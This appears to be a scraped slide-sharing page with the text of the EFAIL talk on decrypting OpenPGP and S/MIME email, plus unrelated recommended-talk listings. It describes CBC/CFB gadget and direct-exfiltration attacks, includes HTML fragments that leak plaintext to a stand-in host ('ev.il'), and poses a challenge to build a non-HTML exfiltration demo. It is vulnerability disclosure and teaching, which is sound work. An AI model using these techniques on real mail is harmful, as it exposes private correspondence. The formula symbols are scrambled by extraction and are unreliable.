attacking end to end encrypted emails
play

Attacking End-to-End Encrypted Emails Joint research with : Prof. - PowerPoint PPT Presentation

Mar 10, 2023 •273 likes •1.01k views

https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Mller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jrg

  1. https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Müller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk, Marcus Brinkmann.

  2. Email. 2

  3. av2.com av1.com smtp.corp2 smtp.corp1 imap.corp2 imap.corp1 archive.corp1 archive.corp2

  4. av1.com smtp.corp1 imap.corp1 archive.corp1

  5. There is no such thing as “My Email”. 5

  6. av1.com Assumption: smtp.corp1 imap.corp1 Attacker has archive.corp1 access to emails!

  7. Two competing standards OpenPGP (RFC 4880) • First “encryption for the masses” • Favored by privacy advocates • Most widely used email clients require plugin S/MIME (RFC 5751) • Favored by corporate organizations • Native support in most widely used email clients 7

  8. New published PGP public keys per month ? Known limitations!  Usability  Snowden Effekt Thanks to Marcus Brinkmann @neopg_  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 8

  9. Daily users of Enigmail Known limitations!  Usability  Snowden Effekt  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 9

  10. ‘99 ‘06 ‘15 10

  11. PGP and OpSec  Some tutorials recommend using PGP outside of email client. • https://gist.github.com/grugq/ 03167bed45e774551155 • https://vimeo.com/56881481  Others recommended Enigmail in default settings (i.e. HTML switched on) 11

  12. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker 12

  13. 2014: Enigmail won’t encrypt. https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/ 13

  14. 2017: Outlook includes plaintext in encrypted email. https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/ 14

  15. 2018: Enigmail/PEP won‘t encrypt. https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html 15

  16. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 16

  17. Hybrid decryption • Choose message 𝑛 Content-type: app/encrypted • Generate session key 𝑡 𝒍 𝑡 • Encrypt message 𝑛 with session key 𝑡 Dear Alice, – 𝑑 = 𝐵𝐹𝑇 𝑡 (𝑛) • Encrypt session key 𝑡 with public key c thank you for your email. 𝑞𝑣𝑐 of recipient The meeting tomorrow – 𝑙 = 𝑆𝑇𝐵 𝑞𝑣𝑐 (𝑡) will be at 9 o‘clock . • Send the encrypted session key and the encrypted message to the recipient 17

  18. Hybrid decryption • Obtain the encrypted email Content-type: app/encrypted • Extract ciphertext 𝑙 and ciphertext 𝑑 𝒍 𝑡 • Decrypt 𝑙 with private key 𝑡𝑓𝑑 to Dear Alice, obtain session key 𝑡 – 𝑡 = 𝑆𝑇𝐵 𝑡𝑓𝑑 (𝑙) c thank you for your email. • Decrypt ciphertext 𝑑 with session key The meeting tomorrow 𝑡 to obtain the cleartext 𝑛 will be at 9 o‘clock . – 𝑛 = 𝐵𝐹𝑇 𝑡 𝑑 18

  19. Ciphertext malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 19

  20. CBC Mode of Encryption C 2 C 1 C 0 decryption decryption Content-type: te xt/html\nDear Bob P 0 P 1 20

  21. Malleability of CBC/CFB C 2 C 1 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 0 ' P 1 21

  22. Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 decryption decryption 0000000000000000 xt/html\nDear Bob P 0 ' P 1 CBC Gadget 22

  23. Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 ⊕ P c decryption decryption <img src =” ev.il/ xt/html\nDear Bob P c P 1 23

  24. Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 0 ' P 1 ' 24

  25. Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 0 ' P 1 ' 25

  26. Ciphertext Malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 26

  27. MAC != digital signature “valid signature” Message Authentication Codes • Protection against ciphertext tampering “invalid signature” Digital Signatures? • Merely used to display status message or icon • In many cases, attacker can – remove signatures “encrypted, not signed” – sign unknown ciphertext under own identity 27

  28. S/MIME 28

  29. S/MIME 29

  30. Attacking S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted <base " " href="http:"> ???????????????? ???????????????? <img " ???????????????? ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi "> ???????????????? Modify Duplicate Reorder 30

  32. Backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt 40/47 clients have User interaction Airmail MailMate Apple Mail macOS No user interaction backchannels requiring Mail App Outlook CanaryMail iOS Leak via bypass no user interaction K-9 Mail MailDroid J avascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru Mailbox ProtonMail Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 32

  33. • S/MIME has no standard- conforming countermeasure • Email clients try to mitigate this (insufficiently) 33

  34. Demo ohne html

  35. Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 35

  36. Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 36

  37. Outlook: Non-HTML CBC Gadgets? recommendations MS Word 28.12.2018 37

  38. Outlook: Non-HTML CBC Gadgets? recommendations LibreOffice 28.12.2018 38

  39. Outlook: Non-HTML CBC Gadgets? Challenge: 1. Write a non-HTML demo that exfiltrates OpenPGP or S/MIME email plaintext blocks via attachments (PDF, Word, XML, ...). 2. First successful submission gets a crate of Club Mate and Efail swag! 39

  40. Efail-related changes to S/MIME Efail CBC Gadget attack: Efail direct exfiltration attack: EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, 28.12.2018 40 https://tools.ietf.org/html/draft-ietf-lamps-rfc5751-bis-12#page-45 Schwenk

  41. OPENPGP 41

  42. Differences S/MIME  OpenPGP • OpenPGP uses a variation of CFB-Mode • Plaintext compression is enabled by default • OpenPGP defines Modification Detection Code “MDC“ ( 𝑇𝐼𝐵1(𝑛) ) MDC SEIP m sha1(m) 42

  43. OpenPGP RFC on invalid MDCs 43

  44. # new PGP keys with/without MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 44

  45. # cumulative valid PGP keys not supporting MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 45

  46. Attacking OpenPGP 1. MDC stripped: SEIP m sha1(m) 2. MDC incorrect: SEIP m‘ sha1(m) 3. SEIP->SE downgrade SEIP m sha1(m) 46

  47. Attacking OpenPGP Client Plugin (up to MDC Stripped MDC Incorrect SEIP -> SE version) Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 47

  48. Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#section-5.8 48

  49. Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-104 49

  50. Efail-related changes to OpenPGP Checking MDC only possible after full decryption – GnuPG streams plaintext to app during decryption – Only when finished, GnuPG prints flag whether or not decryption was successful. OpenPGP draft already supported chunking of plaintext – Pro: Authenticate chunks before giving it to app! – Con: Recommended chunk size is 128MByte (OpenPGP implementations may not want to cache 128MByte and thus use streaming again) https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-63 https://mailarchive.ietf.org/arch/msg/openpgp/KXM9nqbhkn3ELTznP6YBQhEipC0 50

  51. Efail-related changes to GnuPG • MDC errors now result in hard failures (not merely warnings). • GnuPG now always uses MDC independently if key denotes MDC support or not. • But: – Sets default chunks sizes from 1GByte to 128MByte. – Still streams unauthenticated plaintext. 51

  52. av1.com smtp.corp1 imap.corp1 archive.corp1

  53. Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 53

  54. Efail Direct Exfiltration Alice’s mail program encrypts the email Alice writes a Mail to Bob Encryption From: Alice To: Bob -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock . -----END PGP MESSAGE----- 54

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti

15 Years of Broken Encrypted Emails and were still doing it wrong Alfredo Pironti IOActive alfredo.pironti@ioactive.com IMDEA - NEXTLEAP 3 Mar 2017 1 Agenda Intro to OpenPGP An efficient attack on signatures And

459 views • 25 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit

Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit

Towards a Fully Encrypted Internet CS244 | Zakir Durumeric 2013 Snowden Revelations Explicit evidence that intelligence agencies are globally wiretapping Internet backbone connections Massive collection of web tra ffi c, emails, instant

512 views • 50 slides
TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1

TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1

TLS 1.3 Encrypted SNI ekr: ekr@rtfm.com dkg: dkg@aclu.org IETF 94 TLS 1.3 Encrypted SNI 1 DISCLAIMER: THIS IS NOT FULLY-BAKED We just fleshed out this idea yesterday, so its hand-wavy. Insufficient analysis has been done. IETF 94 TLS 1.3

886 views • 11 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website by Friday afternoon students receive registration cards &amp; elective course

392 views • 25 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website students received registration cards &amp; elective course descriptions

622 views • 22 slides
Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff

Administration emails listed in program Emails also listed under Faculty &amp; Staff on our website Copy of presentation posted on our website by Friday afternoon students receive registration cards registration cards

451 views • 32 slides
Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted

Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted

Challenges With Building End-to-End Encrypted Challenges With Building End-to-End Encrypted Applications Learnings From Etesync Applications Learnings From Etesync stosb.com/talks Tom Hacohen tom@stosb.com FOSDEM 2019 @TomHacohen

361 views • 32 slides
FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from

FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from

FUNDAMENTAL RULES OF AWESOME EMAILS THAT SELL Remove all visual branding The from field should be YOUR name You need a compelling subject line The content must be digestible You cant send too many emails You need to

323 views • 16 slides
Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov Claudio Orlandi Aarhus University RWC 2018 Agenda I A Threat Model for Encrypted Cloud Storage (ECS). I A high-level look into a modern ECS service

770 views • 47 slides
Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted]

Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted]

Garrett Robinson and Yan Zhu Real World Crypto 2015 Goal i dunno how to PGP [encrypted] [encrypted] Who uses it? https://freedom.press/securedrop/directory Threat Model Assets Sources identity Confidentiality &amp; integrity

782 views • 35 slides
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have

733 views • 48 slides
Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical

Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical

Supporting Less-Than Queries on Encrypted Data using Multi-Server Secret Sharing and Practical Order-Revealing Encryption Nate Chenette ICERM conference on Encrypted Search June 12, 2019 Project Background Baffle Inc. https://baffle.io/

407 views • 23 slides
HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate!

HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate!

HOW TO WRITE A PROFESSIONAL Tips and Tricks to making your EMAIL emails work appropriate! PERSONAL V. PROFESSIONAL EMAILS Personal Professional Informal Formal Between friends and family Between business professionals Peer

469 views • 11 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Annex 62 &amp; Subtask C Climate Overview of Contributions Design Influences

Annex 62 &amp; Subtask C Climate Overview of Contributions Design Influences

Ventilative Cooling in Buildings: Now &amp; In The Future BBRI Institute 23 rd October 2017 Design and Performance of Ventilative Cooling: A Review of Principals, Strategies and Components from International Case Studies Paul D OSullivan

437 views • 19 slides
Update pdate and Discussion of Other and Discussion of Other Large Demo/Pilot Plant Projects

Update pdate and Discussion of Other and Discussion of Other Large Demo/Pilot Plant Projects

Plenary Session 02: Plenary Session 02: Update pdate and Discussion of Other and Discussion of Other Large Demo/Pilot Plant Projects Large Demo/Pilot Plant Projects Moderated by: Sho Kobayashi Sigfrid Michelfelder Radisson Hotel

55 views • 3 slides
Handout 4 Summary of this handout: Block Ciphers continued Modes of Operation Cryptomeria

Handout 4 Summary of this handout: Block Ciphers continued Modes of Operation Cryptomeria

06-20008 Cryptography The University of Birmingham Autumn Semester 2012 School of Computer Science Eike Ritter 19 October, 2012 Handout 4 Summary of this handout: Block Ciphers continued Modes of Operation Cryptomeria II.1.5 Modes

353 views • 7 slides
Your Host : Darren Rowse web : ProBlogger.net twitter : @ProBlogger facebook : facebook/problogger

Your Host : Darren Rowse web : ProBlogger.net twitter : @ProBlogger facebook : facebook/problogger

Your Host : Darren Rowse web : ProBlogger.net twitter : @ProBlogger facebook : facebook/problogger Guest : Tsh Oxenreider web : SimpleMom.net twitter : @SimpleMom facebook : facebook/simplemomblog Our Webinar Hashtag is #PBWebinar To Be Notified

457 views • 27 slides
fourteen wood construction: column design Wood Columns 1 Elements of Architectural Structures

fourteen wood construction: column design Wood Columns 1 Elements of Architectural Structures

E LEMENTS OF A RCHITECTURAL S TRUCTURES : F ORM, B EHAVIOR, AND D ESIGN ARCH 614 D R. A NNE N ICHOLS S PRING 2019 lecture fourteen wood construction: column design Wood Columns 1 Elements of Architectural Structures S2019abn Lecture 14

517 views • 18 slides
TE Mode Ridg TE idged Waveguid ide Ca Cavit itie ies for r ADMX Rese search Al l Moretti,

TE Mode Ridg TE idged Waveguid ide Ca Cavit itie ies for r ADMX Rese search Al l Moretti,

Managed by Fermi Research Alliance, LLC for the U.S. Department of Energy TE Mode Ridg TE idged Waveguid ide Ca Cavit itie ies for r ADMX Rese search Al l Moretti, FN FNAL nd Workshop on 2 nd on Mic icrowave Cavitie ies an and De

616 views • 17 slides
Sobriety and congruence biframes Graham Manuell graham@manuell.me University of Edinburgh

Sobriety and congruence biframes Graham Manuell graham@manuell.me University of Edinburgh

Sobriety and congruence biframes Graham Manuell graham@manuell.me University of Edinburgh Workshop on Algebra, Logic and Topology September 2018 1 Overview Sober spaces are the only topological spaces that can be faithfully represented

570 views • 36 slides
Approximation of mean curvature motion with nonlinear Neumann conditions Yves Achdou joint work

Approximation of mean curvature motion with nonlinear Neumann conditions Yves Achdou joint work

Approximation of mean curvature motion with nonlinear Neumann conditions Yves Achdou joint work with M. Falcone Laboratoire J-L Lions, Universit e Paris Diderot Padova 2012 Y. Achdou HYP2012 Padova The boundary value problem The PDE

843 views • 34 slides

More recommend